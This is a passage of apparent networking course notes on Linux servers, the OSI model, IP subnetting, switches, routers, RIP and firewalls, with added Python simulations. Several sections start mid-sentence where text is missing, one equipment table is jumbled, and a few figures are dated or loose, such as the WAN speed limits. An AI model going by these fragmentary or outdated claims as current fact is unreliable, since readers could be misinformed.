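    """The three rules from the notes, in the order they were appended."""
    inp = Chain("INPUT")
    inp.append(Rule("DROP", src="192.168.0.254"))
    inp.append(Rule("DROP", src="192.168.0.251", in_iface="eth3"))
    out = Chain("OUTPUT")
    out.append(Rule("DROP", dst="192.168.0.254", negate_dst=True))
    return {"INPUT": inp, "OUTPUT": out}
```

Inserting an ACCEPT for 192.168.0.0/24 at the head of INPUT (the equivalent of -I INPUT) makes the DROP for 192.168.0.254 unreachable, which is the ordering mistake the simulation makes visible before the rule set is loaded on a real host.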
11. SERVERS
11.1 DNS SERVER
DNS is the Domain Name System, which maintains a database that can help your computer translate domain names such as www.redhat.com to IP addresses such as 216.148.218.197. As individual DNS servers are not large enough to keep a database for the entire Internet, they can refer requests to other DNS servers. This section addresses two basic DNS server configurations: a caching-only server, and a primary DNS server for a domain. The key configuration files to support such servers include /etc/nsswitch.conf, /etc/resolv.conf, and /etc/hosts,/etc/named.conf,/var/named/.
Figure: the DNS tree. The root sits at the top; below it are the top-level domains (.edu, .gov, .com, .org, ...), and india.gov is a second-level name under gov.

The DNS root has a small set of top-level domains that rarely changes. Some of them are aero, com, net, edu, gov, info, org, int and name. In a domain name like www.poornima.org, org is a first-level name within the root, poornima is a second-level name within org, and www is a third-level name within poornima. The tree can extend to any number of levels, but in general it is not more than four levels deep.
addresses are either dynamically assigned from a range or pool of addresses, or statically assigned by MAC address.
Service profile: DHCP
Type: System V-launched scripts
Packages: dhcp
Daemons: dhcpd
Scripts: dhcpd
Ports: 67 (bootps, server side), 68 (bootpc, client side)
Configuration: /etc/dhcpd.conf
Related: dhclient

Figure: a DHCP server at 192.168.0.1 with clients PC 1 (192.168.0.18) and PC 3 (192.168.0.20) connected through a switch.
supported NFS (both as a client and a server) for years, and NFS continues to be popular in organizations with UNIX- or Linux-based networks.
Key files of the nfs-utils package:
- /etc/rc.d/init.d/nfs (start/stop script for NFS)
- /etc/rc.d/init.d/nfslock (start/stop script for lockd and statd)
- /usr/share/doc/nfs-utils-version (documentation, mostly in HTML format)
- Server daemons in /usr/sbin: rpc.mountd, rpc.nfsd
- Server daemons in /sbin: rpc.lockd, rpc.statd
- Control programs in /usr/sbin: exportfs, nfsstat, nhfsstone, showmount
- Status files in /var/lib/nfs: etab, rmtab, statd/state, xtab
The portmap package includes the following key files:
- /etc/rc.d/init.d/portmap (start/stop script)
- /usr/share/doc/portmap-version (documentation)
- Server daemon in /sbin: portmap
- Control programs in /usr/sbin: pmap_dump, pmap_set
You can do four basic things with Samba: - Share a Linux directory tree with Windows computers. - Share a Windows directory with Linux computers. - Share a Linux printer with Windows computers. - Share a Windows printer with Linux computers.
It is easy to configure Samba to do a number of things on a Microsoft-based network:
- Participate in a Microsoft Windows 9x-style workgroup or an NT/2000/XP domain as a client or a server.
- Act as a Primary or Backup Domain Controller.
- Share user home directories.
- Act as a WINS client or server.
- Link to or manage a workgroup browse service.
- Act as a Master Browser.
- Provide user/password and share security databases locally, from another Samba server, or from a Microsoft Domain Controller.
- Configure local directories as shared SMB file systems.
- Synchronize passwords between Windows and Linux systems.
- Download print drivers to Microsoft clients.

11.6.1 These are the four Samba RPM packages that you need:
- The samba package includes the basic SMB server software for sharing files and printers.
- The samba-common package contains common Samba configuration files.
- The samba-client package provides the utilities needed to connect to shares on Microsoft computers.
- The samba-swat package includes the aforementioned SWAT configuration tool.

Figure: a Linux Samba server and a printer connected to the clients through a switch.
Table 11.1: Hardware and software requirements for a Red Hat Linux network installation
Item                                                        Quantity
Pentium-based server with 64 MB RAM
Hard disk drive of minimum 4.3 GB
Ethernet card (NIC) 10/100 Mbps                             10 Nos
Ethernet hub 10/100 Mbps, 12 port                           01 Nos
UTP CAT 5e cable                                            500 metres (approx.)
RJ-45 connectors                                            30 Nos
Software and operating system:
Client operating system                                     Red Hat Linux Enterprise Server
Network installation and implementation                     As much
Red Hat Linux Enterprise Server installation and configuration (LAN/WAN)
12.3.2 High reliability: as all files can be replicated on two or three machines, if one of them is unavailable (due to hardware failure) the other copies can be used.
12.3.3 Scalability: the ability to increase system performance gradually as the workload grows, simply by adding more processors.
A computer network can provide a powerful communication medium among widely separated employees. The use of networks to enhance human-to-human communication will probably prove more important than technical goals such as improved reliability. These are the requirements of companies, but computer networking is needed even in normal day-to-day life: we access the Internet to learn what is happening in the world and to communicate with people far away using e-mail. These are the reasons that drove inventors to create networking devices, models and protocols. Networking was born in 1844, when Samuel Morse sent the first telegraph message.
Table 12.1
Table 12.2
WANs run at speeds of at most 2 to 10 Mbps. For most WANs the long-distance bandwidth is relatively low: on the order of kilobits per second (kbps), as opposed to megabits per second (Mbps) for local-area networks (LANs). For example, an Ethernet LAN has a 10 Mbps bandwidth, while a WAN using part or all of a T1 carrier has a bandwidth of 1.544 Mbps.
interfaces between these layers. The layers break a large, complex set of concepts and protocols into smaller pieces, making it easier to talk about, to implement in hardware and software, and to troubleshoot.

12.6.1 The following list summarizes the benefits of layered protocol specifications:
- Humans can more easily discuss and learn about the many details of a protocol specification.
- Standardized interfaces among layers facilitate modular engineering.
- A better environment for interoperability is created. One vendor can write software that implements the higher layers (for example, a Web browser) and another can write software that implements the lower layers (for example, Microsoft's built-in TCP/IP software in its operating systems).
- Reduced complexity allows easier program changes and faster product evolution.
- One layer uses the services of the layer immediately below it, so remembering what each layer does is easier. (For example, the network layer needs to deliver data from end to end. To do this, it uses data links to forward data to the next successive device along that end-to-end path.)

Figure 12.3

- Provides acknowledgment of successful transmissions; requests retransmission if some packets do not arrive error-free
- Provides flow control and error handling
Protocols: TCP, UDP
12.7.1.5 NETWORK LAYER
- Translates logical network addresses into physical addresses (e.g. IP address ==> MAC address, via ARP)
- Responsible for addressing and determining routes for sending
- Manages network problems such as packet switching, data congestion and routing
- If a router cannot forward a frame as large as the source computer sends, the network layer compensates by breaking the data into smaller units (fragmentation); at the receiving end, the network layer reassembles the data
- Think of this layer as stamping the addresses on each train car
Protocols: IP, ARP, RARP, ICMP, RIP, OSPF
12.7.1.6 DATA LINK LAYER
- Turns packets into raw bits (100101) for transmission and, at the receiving end, turns bits back into packets
- Handles data frames between the Network and Physical layers
- At the receiving end, packages raw data from the Physical layer into data frames for delivery to the Network layer
- Responsible for error-free transfer of frames to the other computer via the Physical layer
- Defines the methods used to transmit and receive data on the network: the wiring, the devices used to connect the NIC to the wiring, the signalling involved in transmitting and receiving data, and the ability to detect signalling errors on the network media
12.7.1.7 Logical Link Control
- Error correction and flow control
- Manages link control and defines SAPs (service access points)
12.7.1.8 PHYSICAL LAYER
- Transmits the raw bit stream over the physical cable
- Defines cables, cards and physical aspects
- Defines NIC attachments to hardware and how the cable is attached to the NIC
- Defines techniques to transfer the bit stream onto the cable
13. IP ADDRESSING
Every machine on the Internet has a unique identifying number, called an IP address. A typical IP address looks like this: 216.27.61.45. An IP address is a 32-bit number, usually written in dotted decimal form, that uniquely identifies an interface of some computer. The 32-bit number is divided into 4 octets, each separated by a dot. Out of the many possible values, certain values are reserved and cannot be used as ordinary addresses: for example, 0.0.0.0 is reserved for the default network (this host on this network) and 255.255.255.255 is the limited broadcast address. Each IP address is split into 2 sections: 1) the network address and 2) the host address. Individual IP addresses in the same network all have a different value in the host part of the address but an identical value in the network part, just as in a town there are different street addresses but the same ZIP code.
13.1.1.1 Loopback- The IP address 127.0.0.1 is used as the loopback address. This means that it is used by the host computer to send a message back to itself. It is commonly used for troubleshooting and network testing.
13.1.2 Class B: used for medium-sized networks; a good example is a large college campus. IP addresses with a first octet from 128 to 191 are part of this class. Class B addresses also include the second octet as part of the network identifier; the other two octets identify each host. Example: in 145.24.53.198 the network part is 145.24 and the host (node) part is 53.198.
13.1.3 Class C: commonly used for small to mid-size businesses. IP addresses with a first octet from 192 to 223 are part of this class. Class C addresses include the second and third octets as part of the network identifier; the last octet identifies each host.
13.1.4 Class D: used for multicast. The first four bits are 1110 (first octet 224 to 239); the other 28 bits identify the group of computers for which the multicast message is intended. Example: 224.24.54.145 (class D prefix 224, group 24.54.145).
13.2 Private IP
It is not necessary that every network we build is connected to some ISP (Internet Service Provider), so we also need private IP addresses that can be used on internal networks. In each class a range of addresses has been reserved for this purpose (RFC 1918):
CLASS A: 10.0.0.0 to 10.255.255.255 (10.0.0.0/8)
CLASS B: 172.16.0.0 to 172.31.255.255 (172.16.0.0/12)
CLASS C: 192.168.0.0 to 192.168.255.255 (192.168.0.0/16)
These addresses are not routed on the public Internet; hosts that use them reach the Internet through address translation (NAT) on the router.
13.3 MASKING
Computers use a mask to define size of network and host part of an address. Mask is a 32-bit number written in dotted decimal form. It provides us the network address when we perform a Boolean AND of mask with the IP address. It also defines number of host bits in an address.
13.4 SUBNETTING
Basically it is the process of subdividing a network into smaller subnets. Suppose we have 2-3 small networks but cannot obtain a separate address block for each of them. With subnetting, the one block we have been given is divided among them so that they become independent networks: we take some bits of the host address and use them as additional network bits, so we get several independent networks out of one address block. Because the mask now covers those extra bits it is called a subnet mask, and the network address now also includes the subnet address. Address format when subnetting is used (classes A, B and C respectively): see the figure.
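The following is an added example, not code from the original notes, covering the addressing, masking and subnetting material above: classful lookup from the leading bits, network and broadcast by Boolean AND/OR with the mask (with a check that the mask is a contiguous run of ones), the RFC 1918 private ranges, and splitting a block by borrowing host bits. Addresses used in the tests are taken from the notes or constructed.

```python
# Added example (not from the original notes): classful address analysis,
# masking with a Boolean AND, RFC 1918 private ranges and subnetting by
# borrowing host bits. Addresses below are from the notes or constructed.
import ipaddress
from typing import List, Tuple

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _to_int(dotted: str) -> int:
    return int(ipaddress.IPv4Address(dotted))


def address_class(dotted: str) -> str:
    """Classful category from the leading bits of the first octet."""
    first = _to_int(dotted) >> 24
    if first < 128:   # 0xxxxxxx
        return "A"
    if first < 192:   # 10xxxxxx
        return "B"
    if first < 224:   # 110xxxxx
        return "C"
    if first < 240:   # 1110xxxx multicast
        return "D"
    return "E"        # 1111xxxx reserved


def is_valid_mask(mask: str) -> bool:
    """A mask must be a run of ones followed by a run of zeros: then the
    inverted mask is 2**k - 1 and adding one clears every bit."""
    inverse = ~_to_int(mask) & 0xFFFFFFFF
    return (inverse + 1) & inverse == 0


def network_and_broadcast(addr: str, mask: str) -> Tuple[str, str]:
    """Network = addr AND mask; broadcast = network OR (NOT mask)."""
    if not is_valid_mask(mask):
        raise ValueError(f"non-contiguous mask {mask}")
    a, m = _to_int(addr), _to_int(mask)
    net = a & m
    bcast = net | (~m & 0xFFFFFFFF)
    return str(ipaddress.IPv4Address(net)), str(ipaddress.IPv4Address(bcast))


def host_bits(mask: str) -> int:
    """Number of zero bits in the mask, i.e. bits left for the host part."""
    return 32 - bin(_to_int(mask)).count("1")


def usable_hosts(mask: str) -> int:
    """All host-bit patterns minus the network and broadcast addresses."""
    return max(2 ** host_bits(mask) - 2, 0)


def is_rfc1918(addr: str) -> bool:
    """True if the address lies in one of the three private blocks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def subnet(network_cidr: str, borrowed_bits: int) -> List[str]:
    """Borrow `borrowed_bits` host bits to split one network into 2**n subnets."""
    net = ipaddress.ip_network(network_cidr, strict=True)
    return [str(s) for s in net.subnets(prefixlen_diff=borrowed_bits)]
```

Borrowing two host bits from 192.168.0.0/24 yields four /26 subnets of 62 usable hosts each; `is_rfc1918("172.34.1.1")` is False, since the class B private block ends at 172.31.255.255.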
13.5.2 Broadcast Domain- It is the group of PCs those will receive same broadcast
message. CSMA/CD (Carrier Sense Multiple Access/ Collision Detection)- In this protocol when a PC wants to transmit any packet it sense the carrier i.e. the path ,if no other PC is using the carrier then only it sends. If two PCs start sending data simultaneously collision will occur. Both PCs will wait for some random time and then initiate the same process.
13.5.3 MAC (Media Access Control) - IEEE 802.3 (Ethernet) and IEEE 802.5 (Token Ring) define the MAC sublayers of these two LAN data-link protocols.
13.5.4 Burned-in address: The 6-byte address assigned by the vendor that makes the card. It is usually burned into a ROM or EEPROM on the LAN card and begins with a 3-byte Organizationally Unique Identifier (OUI) assigned by the IEEE. Locally administered address: an address set through configuration that is used instead of the burned-in address. Because the address a card presents can be changed in software, a MAC address identifies an interface but does not authenticate it.
13.5.5 Unicast address: A MAC address that represents a single LAN interface.
13.7 CABLES
There are different cabling options depending on the access method:
13.7.1 Twisted pair
Typical lengths are up to 100 m. Twisted-pair networks use a star topology.
13.7.2 Coaxial
Coaxial cable uses BNC connectors (thin coax, 10BASE2) or N-type connectors (thick coax, 10BASE5). The maximum segment length is around 185 m for thin coax and 500 m for thick coax. Coaxial networks use a single bus topology, so every station shares one cable and one collision domain, and a single break or bad terminator takes the whole segment down.
13.7.3 Fibre optic
Fibre makes it possible to send data over about 10 kilometres. Fibre optic cable uses SC, ST or LC connectors (the most common in use is the SC connector). In fibre cables the data is converted to light signals and the signal is made to propagate through the fibre. There are two types of fibre optic cable available:
1. Single mode: typical length is up to about 10 km (5 km per the 1000BASE-LX standard, more with long-haul optics) at a data rate of 1000 Mbps. The core diameter is about 9 µm. This cabling is known as 1000BASE-LX.
2. Multi mode: this is further categorised in two:
SX (1000BASE-SX): typical length is 220 m to 550 m depending on the fibre grade, at a data rate of 1000 Mbps.
FX (100BASE-FX): typical length is up to 2 km in full-duplex operation, at a data rate of 100 Mbps.
Figure 13.4 - The port the RJ-45 plug connects to is the network card. Attach the other end of the cable segment to a modular wall outlet that is wired to the wiring closet, or otherwise to an available port on the switch. Make sure no twisted-pair cable run exceeds 100 metres (328 ft).
depending on the make of the NIC. A physical transmission medium, such as twisted-pair or coaxial cable, interconnects all network interface cards to network hubs or switches. Ethernet and Token Ring are common types of network interface card. Today's cards support 10BASE-T and 100BASE-T (and usually 1000BASE-T) with automatic speed and duplex negotiation.
13.11.1 HUB
When more than two devices need to be interconnected, a device known as a hub comes into the picture. A hub is a layer 1 device, i.e. it operates at the physical layer of the OSI model. It simply repeats: whatever frame it receives on one port it sends out on every other port, whether or not the frame is destined for that port, because a hub has no way of knowing which port a frame should go to. This repeating creates a lot of unnecessary traffic, which leads to poor network response; it also means every station sees every other station's frames, so one host with its card in promiscuous mode can capture all traffic passing through the hub. If two PCs connected to a hub transmit at the same time a collision occurs, so a hub creates a single collision domain; and because every PC connected to a hub gets the same broadcast, it also creates a single broadcast domain. A 10/100 Mbps hub must share its bandwidth among all of its ports: when only one PC is transmitting it has access to the maximum available bandwidth, but when several PCs transmit at once that bandwidth is divided between them and performance degrades. Hubs are half-duplex in nature.
13.11.2 SWITCH
Hubs are capable of joining more than two PCs but have the drawback that if two PCs want to communicate at the same time a collision occurs and both must send their data again. Switches overcome this shortcoming. A switch is an intelligent device that works at layer 2 of the OSI model. It keeps a record of the MAC addresses of the devices connected to it and uses this information to build a MAC address table, so when a frame is received it knows exactly which port to send it out of, which improves network response time.
13.11.2.1 Basic working principle of a switch
- When the switch starts up its MAC address table is empty. Each time a frame is received, the switch reads the frame's source MAC address and records it, together with the port it arrived on, in the MAC address table.
- If the destination MAC address is present in the table, the frame is forwarded only to the corresponding port.
- If the destination MAC address is not present in the table, the frame is flooded out of every available port except the incoming one. When the destination PC replies, the switch examines the source address of the reply frame and updates the MAC address table accordingly, so later frames to that PC are no longer flooded.
If two PCs connected to a switch transmit simultaneously no collision occurs, because every switch port is its own collision domain: a switch creates multiple collision domains. The switch still forwards broadcasts out of every port, so all ports of a switch lie in a single broadcast domain. A 100/1000 Mbps switch allocates the full 100/1000 Mbps to each of its ports, so regardless of the number of PCs transmitting each user always has access to the maximum bandwidth. Switch ports are usually full-duplex. Note that the table is built purely from what arrives on the ports: a station that sends frames with forged source addresses can overwrite entries, and by sending frames from thousands of random addresses it can fill the table so that the switch floods like a hub; port-security features on managed switches, which limit the addresses learned per port, exist to counter this.
13.11.2.2 Switches are of two types: managed and unmanaged.
13.11.2.3 A managed switch supports SNMP (Simple Network Management Protocol).
Different switching principles:
- Store-and-forward: the switch fully receives all bits of the frame (store) before forwarding it (forward). This allows the switch to check the FCS before forwarding the frame. (The FCS is in the Ethernet trailer.)
- Cut-through: the switch performs the address table lookup as soon as the destination address field of the header has been received. The first bits of the frame can be sent out of the outbound port before the final bits of the incoming frame have arrived. This does not allow the switch to discard frames that fail the FCS check. (The FCS is in the Ethernet trailer.)
- Fragment-free: this works like cut-through switching, but the switch waits until 64 bytes have been received before forwarding the first bytes of the outgoing frame. According to the Ethernet specification, collisions are detected within the first 64 bytes of a frame, so frames damaged by a collision are not forwarded. The FCS still cannot be checked.
A bridge is another device that, like a switch, forwards on the basis of MAC addresses. The basic difference between a bridge and a switch is that a bridge does its forwarding in software, whereas a switch does it in hardware: the switch works on ASICs (Application Specific Integrated Circuits).
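As an added example written for this edition (not code from the manual), the following Python model of a store-and-forward learning switch shows the MAC address table being built from source addresses, an unknown destination being flooded, a known destination being sent to one port only, and a frame with a bad FCS being dropped before anything is forwarded. The MAC addresses, payloads and four-port layout are constructed; the FCS is computed with the same CRC-32 as zlib and appended least-significant byte first, as on the wire.

```python
import struct
import zlib

# Added example (not from the manual): a store-and-forward learning switch.
# MAC addresses and payloads are constructed for the demonstration.

BROADCAST = b"\xff" * 6

def mac(text):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))

def build_frame(dst, src, payload, ethertype=0x0800):
    """Ethernet II frame with a correct FCS (CRC-32 over header+payload, little-endian)."""
    body = mac(dst) + mac(src) + struct.pack("!H", ethertype) + payload
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)

def fcs_ok(frame):
    """The check a store-and-forward switch can do and a cut-through switch cannot."""
    if len(frame) < 18:            # 14-byte header + 4-byte FCS minimum
        return False
    body, fcs = frame[:-4], struct.unpack("<I", frame[-4:])[0]
    return zlib.crc32(body) & 0xFFFFFFFF == fcs

class Switch:
    def __init__(self, ports):
        self.ports = list(ports)
        self.mac_table = {}        # learned: source MAC -> ingress port

    def forward(self, in_port, frame):
        """Return the list of egress ports for this frame ([] means dropped)."""
        if not fcs_ok(frame):
            return []              # corrupted frame never leaves the switch
        dst, src = frame[0:6], frame[6:12]
        self.mac_table[src] = in_port          # learn from the SOURCE address
        if dst == BROADCAST or dst[0] & 1:     # broadcast / multicast: flood
            return [p for p in self.ports if p != in_port]
        out = self.mac_table.get(dst)
        if out is None:                        # unknown unicast: flood
            return [p for p in self.ports if p != in_port]
        if out == in_port:                     # already on that segment: filter
            return []
        return [out]                           # known unicast: one port only

def demo():
    """PC A (port 1) talks to PC B (port 2) through a 4-port switch; returns a trace."""
    sw = Switch([1, 2, 3, 4])
    a, b, c = "00:11:22:aa:aa:aa", "00:11:22:bb:bb:bb", "00:11:22:cc:cc:cc"
    trace = []
    trace.append(sw.forward(1, build_frame(b, a, b"hello B")))   # B unknown -> flood
    trace.append(sw.forward(2, build_frame(a, b, b"hello A")))   # A known -> port 1 only
    trace.append(sw.forward(1, build_frame(b, a, b"again")))     # B now known -> port 2
    bad = bytearray(build_frame(a, c, b"garbage"))
    bad[20] ^= 0xFF                                              # flip a payload byte
    trace.append(sw.forward(3, bytes(bad)))                      # FCS fails -> dropped
    return sw, trace

if __name__ == "__main__":
    switch, trace = demo()
    print(trace)
    print({m.hex(":"): p for m, p in switch.mac_table.items()})
```

Because the damaged frame is discarded before its source address is examined, PC C never enters the table; a cut-through switch would already have sent the first bytes of that frame out before it could notice the bad FCS.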
13.11.3 ROUTER
Switches and hubs can only interconnect devices within a single LAN. To interconnect two LANs, or two or more different networks, another device known as a router is used. Its main job is to route (send) packets to other networks, and to do the routing (establishing paths between networks) it uses IP addresses. A router is typically connected to at least two networks, commonly two LANs or WANs, or a LAN and its ISP's network. Routers are located at gateways, the places where two or more networks connect, and they use forwarding tables to determine the best path for forwarding each packet. A router is a layer 3 device, i.e. it operates at the network layer of the OSI model. Its working principle is quite different from that of a switch. A router builds a table known as the routing table, which holds the networks it knows about; it obtains this information directly (the networks configured on its own interfaces) or indirectly (from neighbouring routers, through a routing protocol). When a packet is received the router compares the packet's destination IP address with the networks in its routing table and forwards the packet out of the interface belonging to the best (longest) matching route. If no route matches, and no default route is configured, the router simply discards the packet (normally returning an ICMP destination-unreachable message to the sender) instead of flooding it out of all ports the way a switch does. (Detailed Information about router in chap )
Table 13.1
14. ROUTER
14.1.1 ROM - Stores the router's bootstrap (startup) program, a minimal operating system image, and the power-on diagnostic test programs. Upgrading the ROM normally means replacing the chip.
14.1.2 FLASH MEMORY - Holds the operating system image(s). Flash memory is erasable, reprogrammable ROM. The IOS software is present in this memory and can be upgraded by copying a new image into flash. Flash contents are retained when the router is switched off or restarted.
14.1.3 RAM - Stores operational information such as the routing tables and the router's running configuration file. RAM also provides caching and packet buffering. Its contents are lost when the router is switched off or restarted. When we configure the router we are actually writing into RAM (the running configuration), so our changes disappear at the next reload unless they are saved to NVRAM.
14.1.4 NVRAM - Stores the router's startup configuration file. It does not lose data when the power is switched off, so the startup configuration is maintained even when the router is switched off or restarted.
Figure 14.1
The following steps are used to access a router through the console port from a Windows-based PC. Open HyperTerminal: Start Menu > Programs > Accessories > Communications > HyperTerminal. Select the COM port the console cable is attached to and set the port to the standard console settings (9600 bits per second, 8 data bits, no parity, 1 stop bit, flow control off). After pressing Enter or OK to accept these settings we come to a blank window: this is the session window. Keep in mind that anyone with physical access to the console port can perform the password-recovery procedure and take full control of the router, so routers must be physically secured.
Figure14.3
Figure 14.4
After connecting the router it boots, and once booting is complete the following procedure is adopted.
Router> enable
A prompt asking for the password now automatically appears on the screen:
Password:
Type the password here. This secures privileged access to the router; set it with enable secret rather than enable password, because the latter is stored in a reversible encoding that anyone who can read the configuration can decode. After this the prompt changes to
Router#
which shows that we are in privileged mode. Now we enter configuration mode:
Router# configure terminal
Now the configuration of the router starts. We assign an IP address to every interface connected to the router; the subnet mask must be given with proper care. The following steps are to be followed.
For configuring an Ethernet interface:
Router# configure terminal
Router(config)# interface ethernet 0
Router(config-if)# ip address 223.8.151.1 255.255.255.0
Router(config-if)# no shutdown
Router(config-if)# exit
For configuring serial interfaces:
Router(config)# interface serial 0
Router(config-if)# ip address 204.204.7.1 255.255.255.0
Router(config-if)# no shutdown
Router(config-if)# exit
Router(config)# interface serial 1
Router(config-if)# ip address 199.6.13.2 255.255.255.0
Router(config-if)# no shutdown
Router(config-if)# exit
These commands change only the running configuration in RAM. Save them to the startup configuration in NVRAM with copy running-config startup-config, otherwise they are lost at the next reload.
the default). This means that a RIP router summarizes all routes it knows along classful boundaries and sends the summary information to all other RIP routing devices. A single RIP update message can carry up to 25 routes.
14.4.1.1 RIP TIMERS
TIMER / DEFAULT / CONTROLS
- update: 30 sec. Interval between route update advertisements.
- timeout (invalid): 180 sec. How long a route stays 'live' in the routing table. This timer is reset every time the router hears an update for the route.
- flush: 240 sec. How long to wait, from the time the route was last received, before deleting the route (60 seconds after the timeout).
The routing-update timer controls the time between routing updates. The default is 30 seconds, plus a small random delay to prevent all RIP routers from sending updates simultaneously. The route-timeout timer controls when a route is no longer available; the default is 180 seconds. If the router has not seen the route in an update during this interval, the route is marked invalid and is no longer used. It is kept long enough for the router to advertise it as down (hop count of 16). The route-flush timer controls how long before a route is completely removed from the routing table; the Cisco default of 240 seconds is counted from the last update for the route (the RFC 2453 garbage-collection timer is instead 120 seconds counted from the moment the route times out). Note that the classful RIP described here (RIP version 1) carries no authentication, so any host on a segment can inject routes; RIP version 2 adds MD5 authentication of updates and should be preferred wherever RIP has to be used.
14.4.1.2 BASIC RIP CONFIGURATION
According to the recollection of InetDaemon, configuring a Cisco router for a basic RIP configuration would look something like this:
router> enable
Password:
router# conf t
router(config)# interface ethernet 0
router(config-if)# ip address 192.168.42.1 255.255.255.0
router(config-if)# interface ethernet 1
router(config-if)# ip address 192.168.43.1 255.255.255.0
router(config-if)# exit
router(config)# router rip
router(config-router)# network 192.168.42.0
router(config-router)# network 192.168.43.0
router(config-router)# exit
router(config)# ^Z
router#
The example above assumes that the interfaces that will be running RIP have IP addresses on them that fall within the 192.168.42.0 and 192.168.43.0 class C ranges.
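The timer behaviour described above, as an added Python example for this edition (not code from the manual): a small routing table that installs routes heard from a neighbour, refreshes them on each update, advertises a route as unreachable (16) once the timeout has passed, and removes it once the flush timer has passed. The prefixes and timestamps are constructed, and the hold-down timer that Cisco IOS also runs is left out for clarity.

```python
# Added example (not from the manual): how a RIP router ages routes with the update,
# timeout and flush timers from the table above (Cisco IOS defaults). Routes and
# timestamps are constructed; the router learns from a single neighbour.

UPDATE, TIMEOUT, FLUSH = 30, 180, 240      # seconds
INFINITY = 16                               # hop count meaning "unreachable"

class RipTable:
    def __init__(self):
        self.routes = {}                    # prefix -> {"metric": n, "heard": t}

    def receive(self, prefix, metric, now):
        """Install or refresh a route from a neighbour's update (our hop is added).

        Returns True if the table changed. A metric that reaches 16 is unreachable
        and is never installed; a worse metric is only accepted once the existing
        route has timed out.
        """
        metric = min(metric + 1, INFINITY)
        if metric >= INFINITY:
            return False
        cur = self.routes.get(prefix)
        if cur is None or metric <= cur["metric"] or now - cur["heard"] > TIMEOUT:
            self.routes[prefix] = {"metric": metric, "heard": now}
            return True
        return False

    def expire(self, now):
        """Drop routes whose flush timer has run out; called before each advertisement."""
        for prefix in [p for p, r in self.routes.items() if now - r["heard"] > FLUSH]:
            del self.routes[prefix]

    def advertisement(self, now):
        """What this router sends at its next update: timed-out routes go out as 16."""
        self.expire(now)
        return {prefix: (INFINITY if now - r["heard"] > TIMEOUT else r["metric"])
                for prefix, r in self.routes.items()}

def demo():
    """Neighbour advertises 10.1.0.0/16 at t=0, 30, 60 and then falls silent."""
    table = RipTable()
    for now in (0, 30, 60):
        table.receive("10.1.0.0/16", 1, now)
    table.receive("10.2.0.0/16", 15, 60)       # 15 + 1 = 16: unreachable, rejected
    return {now: table.advertisement(now) for now in (90, 200, 250, 310)}

if __name__ == "__main__":
    for when, adv in demo().items():
        print(when, adv)
```

At t=200 the route has not been refreshed for 140 seconds and is still advertised with its metric of 2; at t=250 (190 seconds) it has timed out and is advertised as 16; at t=310 (250 seconds, past the 240-second flush) it has been removed and is silent.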
14.4.2 IGRP
IGRP is a distance-vector routing protocol that uses a composite metric, built by default from bandwidth and delay, instead of hop count. IGRP is not limited to RIP's 15 hops: its maximum hop limit is 100 by default, and it can be configured to support a network diameter of 255. With IGRP, routers usually select a path with a larger minimum-link bandwidth over a path with a smaller hop count. Links do not have a hop count of their own; each link is exactly one hop. IGRP is available only on Cisco routers (it is proprietary, and has since been removed from recent IOS releases in favour of EIGRP). IGRP load-balances traffic if there are several paths of equal cost to the destination. IGRP sends its routing table to its neighbours every 90 seconds; this default update period of 90 seconds is a benefit compared to RIP, which can consume excessive bandwidth when sending updates every 30 seconds. IGRP uses an invalid timer to mark a route as invalid after 270 seconds (three times the update timer). As with RIP, IGRP uses a flush timer to remove a route from the routing table; the default flush timer is 630 seconds (seven times the update period, more than 10 minutes). If a network goes down or the metric for the network increases, the route is placed in hold-down: the router accepts no new changes for the route until the hold-down timer expires, which prevents routing loops in the network. The default hold-down timer is 280 seconds (three times the update timer plus 10 seconds).
Access lists have two major steps in their logic: matching and action. The matching logic examines each packet and determines whether it matches an access-list statement. Statements are tested in the order they were entered, top to bottom, and the first statement that matches decides the outcome, so a later, more specific statement is never reached if an earlier general one already covers the packet. As soon as a statement is matched there are two actions to choose from: deny and permit. Deny means the packet is discarded, and permit means the packet continues on its way. A packet that matches no statement at all is discarded by the implicit deny at the end of every access list; a list that contains only deny statements therefore blocks everything.
14.5 FIREWALL
As networks grow and connect ever more widely, the danger of information leaking in and leaking out grows with them, so a mechanism is required to keep the good bits in and the bad bits out. For this we use a FIREWALL. A firewall is a device of some kind that separates and protects our network, in most cases from the Internet. It restricts traffic to only what is acceptable and monitors what is happening. Every firewall has at least two network interfaces, one for the network it is intended to protect and one for the network it is exposed to. A firewall sits at the junction point or gateway between the two networks, usually a private network and a public network such as the Internet. It may be a hardware device or a software program running on a secure host computer. A hardware device means a physical device connected at the gateway that checks every incoming or outgoing packet; a software program means software loaded on a computer that determines what to allow and what to reject. A firewall examines all traffic routed between the two networks to see whether it meets certain criteria, and it filters both inbound and outbound traffic.
Technologies
When a firewall is installed no PC makes a direct connection to the outside world. Instead it uses a proxy: each PC sends its request to the proxy, which then forwards the request to the Internet or outside world on the PC's behalf and relays the answer back, so the outside only ever sees the proxy.
Stateful Inspection
It combines packet filtering with the idea behind proxy services. It is considerably stronger than plain packet filtering because connections are not only checked against the ACL but are also recorded in a state table. After a connection has been established, every subsequent packet of the session is compared with the state table; a packet that does not match the recorded state of any connection is dropped, so unsolicited packets from outside never reach the inside even when their port numbers make them look like replies.
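The access-list matching and action logic described earlier in this chapter and the state table described under Stateful Inspection, as one added Python example for this edition (not code from the manual): an ordered rule list evaluated top-down with the implicit deny, a check for rules shadowed by an earlier one, and a firewall that records permitted outbound flows so that only their replies are admitted. The inside network 10.10.10.0/24 and the outside addresses (taken from the RFC 5737 documentation ranges) are constructed.

```python
from ipaddress import ip_address, ip_network

# Added example (not from the manual): ordered ACL matching with the implicit deny,
# and a state table that admits only replies to sessions the ACL already permitted.
# Networks and packets are constructed; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for "the Internet".

# Rule = (action, protocol, source network, destination network, destination port or None)
OUTBOUND_ACL = [
    ("deny",   "tcp", "10.10.10.0/24", "0.0.0.0/0", 23),    # no Telnet out of the LAN
    ("permit", "tcp", "10.10.10.0/24", "0.0.0.0/0", 80),
    ("permit", "tcp", "10.10.10.0/24", "0.0.0.0/0", 443),
    ("permit", "udp", "10.10.10.0/24", "0.0.0.0/0", 53),
]

def rule_matches(rule, pkt):
    _, proto, src, dst, dport = rule
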